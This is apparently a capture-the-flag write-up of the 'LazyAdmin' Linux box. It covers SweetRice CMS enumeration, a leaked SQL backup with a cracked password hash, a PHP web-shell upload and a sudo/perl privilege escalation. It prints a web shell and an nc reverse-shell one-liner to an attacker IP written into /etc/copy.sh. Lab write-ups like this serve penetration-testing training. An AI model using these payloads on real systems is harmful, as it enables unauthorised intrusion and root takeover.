LazyAdmin | Linux
Difficulty: Easy–Medium
Tags: CMS, SQL disclosure, file upload, privesc, sudo misconfig
Tools Used: Nmap, Gobuster, Searchsploit, CrackStation, Netcat, Python

A lazy sysadmin is a goldmine for an attacker. LazyAdmin is proof: find the breadcrumbs they left behind, and you’ll walk a straight line to root. This box is a surgical exercise in classic exploitation—misconfigured CMS, exposed backups, sloppy upload validation, and a laughable Perl-to-root escalation path. If you’re hunting for OSCP-ready muscle memory, this one will sharpen your instincts.

Initial Enumeration

First strike: full Nmap scan with scripts and versioning enabled.

nmap -sC -sV -oN init-scan 10.10.80.64

Results lit up:

22/tcp   open  ssh     OpenSSH 7.2p2  
80/tcp   open  http    Apache 2.4.18

Port 80 gets the first look. Default Apache splash screen. Nothing useful on the surface—but that’s always where Gobuster earns its keep.

Web Enumeration

Time to rip through directories.

gobuster dir --url http://10.10.80.64 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Paydirt:

/content/

Behind that was SweetRice—a CMS that’s practically an exploit compendium if mismanaged. And this one was clearly neglected.

💡 SweetRice rarely gets patched. Even on real tests, smaller orgs leave it in weird corners of internal or staging servers. Always check for version leaks, and always hunt for backup paths—they’re infamous for it.

Credential Exposure via DB Backup

Pulled up Exploit-DB:

searchsploit sweetrice

Noticed version 1.5.1 had a backup disclosure bug. Checked the usual suspect:

http://10.10.80.64/content/inc/mysql_backup/

Jackpot: backup.sql sitting there in plain sight.

Downloaded and cracked open:

cat backup.sql | grep password

Found a hash:

42f749ade7f9e195bf475f37a44cafcb

Tossed it into CrackStation:

Password: password123

Lazy credentials for LazyAdmin. Let’s go.

Admin Panel Access and File Upload Exploit

Panel login page lived at:

http://10.10.80.64/content/as/

Logged in as manager with the cracked password.

CMS confirmed as SweetRice 1.5.1. Next step: find a weaponized exploit.

searchsploit sweetrice

Exploit 40700 stood out—file upload vulnerability in the Ads module. It allows uploading arbitrary files, including PHP.

Uploaded a reverse shell payload (PentestMonkey classic):

<?php system($_GET['cmd']); ?>

Listener armed:

nc -nlvp 31337

Then triggered:

http://10.10.80.64/content/attachment/reverse_shell.php

Shell acquired as www-data.

Privilege Escalation

Spawned a proper TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Checked sudo privileges:

sudo -l

The target practically begged to be pwned:

(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

Inspected the Perl script:

cat /home/itguy/backup.pl

Content:

#!/usr/bin/perl
system("sh", "/etc/copy.sh");

The real payload? /etc/copy.sh. Checked perms:

ls -l /etc/copy.sh

Writable. And that’s game.

Replaced it with a reverse shell:

echo 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attacker-ip> 5554 > /tmp/f' > /etc/copy.sh

New listener:

nc -nlvp 5554

Triggered the payload:

sudo /usr/bin/perl /home/itguy/backup.pl

Got root.

whoami
root
cat /root/root.txt

Summary / Review

This box wasn’t hard. It was neglected—and that’s deadlier. Let’s run it back:

1. Recon spotted port 80 and a stock Apache page.

2. Gobuster uncovered /content/, revealing a dusty SweetRice CMS.

3. Database backup leaked creds from a .sql file.

4. Login + upload let us drop a shell through the Ads module.

5. Sudo misconfig handed us root via a writable script and an unguarded Perl call.

It’s not just about vulnerabilities. It’s about bad habits—leaving backups in prod, reusing weak passwords, writing scripts with escalated perms pointing to writable locations. That’s how red teamers get in, fast and quiet.

Command Recap

nmap -sC -sV -oN init-scan 10.10.80.64  
gobuster dir --url http://10.10.80.64 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  
searchsploit sweetrice  
curl http://10.10.80.64/content/inc/mysql_backup/backup.sql  
Crack hash: CrackStation  
Login to http://10.10.80.64/content/as/  
Upload PHP shell via Ads module  
nc -nlvp 31337  
python -c 'import pty; pty.spawn("/bin/bash")'  
sudo -l  
echo 'reverse shell payload' > /etc/copy.sh  
nc -nlvp 5554  
sudo /usr/bin/perl /home/itguy/backup.pl

Final Thoughts

A stale CMS, exposed DB dump, and lazy privilege boundaries—this one practically hacked itself. Fast creds, clean shell, effortless root — just how I like it.